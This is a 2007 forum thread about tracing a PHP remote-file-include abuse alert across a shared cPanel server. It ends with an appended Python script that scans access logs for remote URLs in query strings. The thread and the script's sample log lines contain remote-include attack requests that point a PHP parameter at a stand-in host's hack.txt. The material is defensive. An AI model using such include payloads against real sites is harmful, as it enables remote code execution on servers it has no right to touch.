

PHP exploit




Posted by The Critic, 11-24-2007, 11:51 PM
My provider sent me an abuse ticket with the message below. This is a cPanel server with 300 domains. How do I go about tracking down the problem? They can’t give me any more information and I don’t know where else to look.
This ticket was automatically generated by the XXXXXXXXXXXXXX Network Protection System. An unusual amount of traffic has been detected involving your IP address xx.xx.xx.xx. Details of the event follow:
3885: HTTP: PHP File Include Exploit
This filter detects an attempt to post the contents of an external script to a PHP application. This behavior is typical of a PHP file include vulnerability attack. This attack could allow an attacker to insert custom code into a variable that would be executed by all users of the vulnerable application.
Thanks.

Posted by Dave W, 11-24-2007, 11:53 PM
They didn't give you any more information? An example of the actual execution would have been nice.

Posted by The Critic, 11-24-2007, 11:56 PM
No, that is what they provided. They also provide links to examples of PHP file include attacks, but not from my server. I can't post them as I'm a new user here.

Posted by Dave W, 11-24-2007, 11:59 PM
If they provided an example like index.php?http://somewebsite.ru/hack.txt you could do a grep "hack.txt" /etc/httpd/domlogs/* but without more information you almost have to check every site on the server. A good place to start would be the /tmp directory.

Posted by The Critic, 11-25-2007, 12:01 AM
tmp is clear.

Posted by The Critic, 11-25-2007, 12:07 AM
These are the links they provided as examples:
http://www.derkeiler.com/Mailing-Lis...5-05/0237.html
http://www.securityfocus.com/bid/14028
http://www.osvdb.org/displayvuln.php?osvdb_id=3592

Posted by Dave W, 11-25-2007, 12:10 AM
Start with
grep "include/common.php" /etc/httpd/domlogs/*
then
grep "php?root_dir=" /etc/httpd/domlogs/*
The other one is Cacti. Are you running a copy of Cacti?
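
Added example, not part of the original thread: when no payload name is available to grep for, the per-domain logs can be searched for any request whose query string carries a remote URL, which covers both the bare index.php?http://... form and a named parameter such as root_dir=. It assumes Apache combined-format logs; the log lines, domains and the remote.example host are constructed.

```python
import re
from urllib.parse import unquote

# Combined Log Format: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
SCHEME_RE = re.compile(r"(?:https?|ftp)://", re.I)

def remote_url_hits(domain, lines):
    """Return one dict per query parameter whose decoded value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        client, target, status = m.groups()
        path, _, query = target.partition("?")
        for pair in query.split("&"):
            name, sep, value = pair.partition("=")
            whole, value = unquote(pair), unquote(value)  # catches http%3A%2F%2F too
            if SCHEME_RE.match(whole):            # bare form: index.php?http://...
                param, url = "(none)", whole
            elif sep and SCHEME_RE.match(value):  # named form: ?root_dir=http://...
                param, url = name, value
            else:
                continue
            hits.append({"domain": domain, "client": client, "path": path,
                         "param": param, "url": url, "status": int(status)})
    return hits

def scan(logs):
    """logs maps domain -> iterable of log lines; answered (2xx) requests sort first."""
    hits = [h for dom, lines in logs.items() for h in remote_url_hits(dom, lines)]
    return sorted(hits, key=lambda h: (h["status"] // 100 != 2, h["domain"], h["path"]))

SAMPLE_LOGS = {  # constructed lines, not taken from the thread
    "site-a.example": [
        '192.0.2.10 - - [24/Nov/2007:23:40:01 -0500] "GET /index.php?http://remote.example/hack.txt HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
        '192.0.2.10 - - [24/Nov/2007:23:40:05 -0500] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
    ],
    "site-b.example": [
        '198.51.100.7 - - [24/Nov/2007:23:41:12 -0500] "GET /include/common.php?root_dir=http%3A%2F%2Fremote.example%2Fhack.txt%3F HTTP/1.0" 404 312 "-" "libwww-perl/5.805"',
        '198.51.100.7 - - [24/Nov/2007:23:41:20 -0500] "POST /contact.php HTTP/1.1" 200 900 "-" "Mozilla/4.0"',
    ],
}

if __name__ == "__main__":
    for h in scan(SAMPLE_LOGS):
        print(h["status"], h["domain"], h["path"], h["param"], h["url"], h["client"])
```

Access logs do not record POST bodies, so this only surfaces payloads passed in the URL, and legitimate redirect-style parameters will also match and need a manual look.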


